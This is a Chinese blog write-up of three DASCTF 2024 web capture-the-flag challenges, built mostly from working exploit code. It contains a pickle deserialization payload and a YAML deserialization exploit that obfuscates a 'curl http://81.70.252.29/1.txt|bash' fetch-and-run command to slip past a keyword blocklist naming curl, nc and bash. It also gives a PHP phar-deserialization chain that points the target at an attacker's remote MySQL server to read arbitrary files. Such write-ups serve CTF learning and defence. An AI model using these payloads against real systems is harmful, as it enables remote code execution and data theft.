首页 > 其他分享 >DASCTF 2024最后一战-WEB-gxngxngxn

DASCTF 2024最后一战-WEB-gxngxngxn

时间:2024-12-22 11:53:53浏览次数:4  
标签:__ WEB return phar 2024 yaml file import DASCTF

DASCTF 2024最后一战

const_python

很直白的pickle反序列化,直接打

import os
import builtins
import pickle
import base64
import subprocess
class A():
    def __reduce__(self):
        return (subprocess.check_output, (["cp","/flag","/app/app.py"],))
a=A()
b=pickle.dumps(a)
with open("1.png", "wb") as f:
     pickle.dump(a, f)
print(base64.b64encode(b))

yaml_matser

import os
import re
import yaml
from flask import Flask, request, jsonify, render_template


app = Flask(__name__, template_folder='templates')

UPLOAD_FOLDER = 'uploads'
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
def waf(input_str):


    blacklist_terms = {'apply', 'subprocess','os','map', 'system', 'popen', 'sleep', 'setstate',
                       'command','static','templates','session','&','globals','builtins'
                       'run', 'ntimeit', 'bash', 'zsh', 'sh', 'curl', 'nc', 'env', 'before_request', 'after_request',
                       'error_handler', 'add_url_rule','teardown_request','teardown_appcontext','\\u','\\x','+','base64','join'}

    input_str_lower = str(input_str).lower()


    for term in blacklist_terms:
        if term in input_str_lower:
            print(f"Found blacklisted term: {term}")
            return True
    return False



file_pattern = re.compile(r'.*\.yaml$')


def is_yaml_file(filename):
    return bool(file_pattern.match(filename))

@app.route('/')
def index():
    return '''
    Welcome to DASCTF X 0psu3
    <br>
    Here is the challenge <a href="/upload">Upload file</a>
    <br>
    Enjoy it <a href="/Yam1">Yam1</a>
    '''

@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        try:
            uploaded_file = request.files['file']

            if uploaded_file and is_yaml_file(uploaded_file.filename):
                file_path = os.path.join(UPLOAD_FOLDER, uploaded_file.filename)
                uploaded_file.save(file_path)

                return jsonify({"message": "uploaded successfully"}), 200
            else:
                return jsonify({"error": "Just YAML file"}), 400

        except Exception as e:
            return jsonify({"error": str(e)}), 500


    return render_template('upload.html')

@app.route('/Yam1', methods=['GET', 'POST'])
def Yam1():
    filename = request.args.get('filename','')
    if filename:
        with open(f'uploads/{filename}.yaml', 'rb') as f:
            file_content = f.read()
        if not waf(file_content):
            test = yaml.load(file_content)
            print(test)
    return 'welcome'


if __name__ == '__main__':
    app.run()

看到一个yaml反序列化,直接绕,bytes命令执行

exp = '__import__("os").system("curl http://81.70.252.29/1.txt|bash")'

print(f"exec(bytes([[j][0]for(i)in[range({len(exp)})][0]for(j)in[range(256)][0]if["+"]]or[".join([f"i]in[[{i}]]and[j]in[[{ord(j)}" for i, j in enumerate(exp)]) + "]]]))")
!!python/object/new:type
args:
  - exp
  - !!python/tuple []
  - {"extend": !!python/name:exec }
listitems: "exec(bytes([[j][0]for(i)in[range(29)][0]for(j)in[range(256)][0]if[i]in[[0]]and[j]in[[95]]or[i]in[[1]]and[j]in[[95]]or[i]in[[2]]and[j]in[[105]]or[i]in[[3]]and[j]in[[109]]or[i]in[[4]]and[j]in[[112]]or[i]in[[5]]and[j]in[[111]]or[i]in[[6]]and[j]in[[114]]or[i]in[[7]]and[j]in[[116]]or[i]in[[8]]and[j]in[[95]]or[i]in[[9]]and[j]in[[95]]or[i]in[[10]]and[j]in[[40]]or[i]in[[11]]and[j]in[[34]]or[i]in[[12]]and[j]in[[111]]or[i]in[[13]]and[j]in[[115]]or[i]in[[14]]and[j]in[[34]]or[i]in[[15]]and[j]in[[41]]or[i]in[[16]]and[j]in[[46]]or[i]in[[17]]and[j]in[[115]]or[i]in[[18]]and[j]in[[121]]or[i]in[[19]]and[j]in[[115]]or[i]in[[20]]and[j]in[[116]]or[i]in[[21]]and[j]in[[101]]or[i]in[[22]]and[j]in[[109]]or[i]in[[23]]and[j]in[[40]]or[i]in[[24]]and[j]in[[34]]or[i]in[[25]]and[j]in[[105]]or[i]in[[26]]and[j]in[[100]]or[i]in[[27]]and[j]in[[34]]or[i]in[[28]]and[j]in[[41]]]))"

strange_php

审会源码

首先看到welcome.php中

这里看可以删除留言,而且message可控,跟进deleteMessage函数

这里一眼顶真,可以触发phar,加上我们可以自定义留言,也就是可控上传文件的内容,所以很明显要打phar反序列化

我们看到UserMessage.php

这里有个__set魔术方法,如果filePath可控的话,就可以实现任意文件读取

那么怎么触发__set呢?

看到PDO_connect.php中

这里是可控的,如果我们将ATTR_DEFAULT_FETCH_MODE指定为262152,就可以将结果的第一列做为类名, 然后新建一个实例,在初始化属性值时,sql的列名就对应者类的属性名,如果存在某个列名,但在该类中不存在这个属性名,在赋值时就会触发类的_set方法。

接着我们看到User.php

这里可以调用到pdo中的get_connection,那么这里就是入口了

我们可以让靶机连我们远程的数据库,来自定义filePath的值,在自己vps上新建个数据库和表

链子如下:

<?php

class User{

  private $conn;

  private $table = 'users';

  public $id;

  public $username="UserMessage";

  private $password="aaaa";

  public $created_at;

  public function __construct() {

​    $this->conn = new PDO_connect();;

  }



}

class PDO_connect{



  private $pdo;

  public $con_options = array(

​    "dsn"=>"mysql:host=81.70.252.29:3306;dbname=users;charset=utf8",

​    'host'=>'81.70.252.29',

​    'port'=>'3306',

​    'user'=>'joker',

​    'password'=>'joker',

​    'charset'=>'utf8',

​    'options'=>array(PDO::ATTR_DEFAULT_FETCH_MODE=>262152,

​      PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION)

  );

  public $smt;

}

$a=new User();

$phar = new Phar("ppppp.phar"); 

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>"); 

$phar->addFromString("happy.txt", 'happy'); 

$phar->setMetadata($a);

$phar->stopBuffering();

$file_contents = file_get_contents("ppppp.phar");

echo urlencode(base64_encode($file_contents));

写入,然后删除

成功触发phar,直接访问log/0bc7be346d4df269543565b6b7cd231a.txt读到flag

标签:__,WEB,return,phar,2024,yaml,file,import,DASCTF
From: https://www.cnblogs.com/gxngxngxn/p/18620905

相关文章

  • 2024-2025-1 20241311 《计算机基础与程序设计》第十三周学习总结
    学期2024-2025-1学号20241311《计算机基础与程序设计》第十三周学习总结作业信息这个作业属于哪个课程<班级的链接>2024-2025-1-计算机基础与程序设计)这个作业要求在哪里<作业要求的链接>2024-2025-1计算机基础与程序设计第一周作业)这个作业的目标<写上具......
  • 20241219
    混凝土期末报告#导入必要的库importpandasaspdimportnumpyasnpimportmatplotlib.pyplotaspltimportseabornassns#数据科学与机器学习库fromsklearn.model_selectionimporttrain_test_split,GridSearchCVfromsklearn.preprocessingimportStandardSc......
  • 2024.12.21 周六
    2024.12.21周六Q1.1000Lottery"ThreeSevens"washeldfor$m$days.Onday$i$,$n_i$peoplewiththenumbers$a_{i,1},\ldots,a_{i,n_i}$participatedinthelottery.Itisknownthatineachofthe$m$days,onlyonewinnerwasselectedf......
  • 2024/12/15 【字符串】卡码网55.右旋字符串 【√】 知识点:input函数的返回值类型是字
    55.右旋字符串(第八期模拟笔试)右旋字符串|代码随想录defrotateRight(s:str,k:int):t=s[-k:]s=t+s[:-k]returnsif__name__=="__main__":k=int(input())s=input()print(rotateRight(s,k))1.Python输入一个整数k的操作错......
  • 2024-2025-1 20241415 《计算机基础与程序设计》第十三周学习总结
    2024-2025-120241415《计算机基础与程序设计》第十三周学习总结作业信息这个作业属于哪个课程2024-2025-1-计算机基础与程序设计这个作业要求在哪里2024-2025-1计算机基础与程序设计第十三周作业这个作业的目标复习知识,巩固所学作业正文https://www.cnblogs......
  • 2024 NOIP 游记
    DAY-1下午惊喜地收到了来自琮琮姐的远程加油&加持【HAPPY!!试机,没啥好试的,遇到崔神说了一句感觉我要废了,很好,挨了一巴掌)。敲完缺省源就撤了。晚上不太舒服,前几天因为身体原因该复习的板子没复习完,特别焦虑,将近12点才睡下觉。DAY0\(8:15\)才到信息楼,不知道为什么门口密......
  • 2024-2025-1 20241308《计算机基础与程序设计》第十三周学习总结
    作业信息这个作业属于哪个课程 <班级的链接>2024-2025-1-计算机基础与程序设计)这个作业要求在哪里 <作业要求的链接>https://www.cnblogs.com/rocedu/p/9577842.html#WEEK13这个作业的目标 第12章并完成云班课测试作业正文教材学习内容总结一、从基本数据类型到抽象数据类型......
  • 【安全评审】“2024网络安全100强-行业应用”评分全流程细则
    一指标理解1.1“行业应用”的核心优势是什么?1.2评估维度有哪些?二、评审专家筛选2.1对专家所在单位有什么要求?2.2对专家所在行业有什么要求?2.3对专家个人能力有什么要求?2.4对专家组有什么要求?2.5对专家个人价值观有什么要求?三、评分规则制......
  • 浅聊web前端性能测试
    最近正好在做web前端的性能测试,这次就来聊聊关于这个的测试思路~首先从用户的思维去思考,关于web前端性能,用户最看重的是什么......其实就是下面三个点:1.加载性能(即页面加载时间+资源加载时间)2.渲染性能(即浏览器绘制出包含实际内容(如文本、图片等)的时间)3.交互......
  • 第21天:信息收集-CDN绕过&Web应用&加速部署&漏洞回链&全网扫描&反向邮件&解析记录
    #知识点1、信息收集-Web应用-CDN加速-如何识别2、信息收集-Web应用-CDN加速-绕过方法一、前置知识:1.传统访问:用户访问域名–>解析服务器IP–>访问目标主机2.普通CDN:用户访问域名–>CDN节点–>真实服务器IP–>访问目标主机3.带WAF的CDN:用户访问域名–>CDN节点(WAF)–>......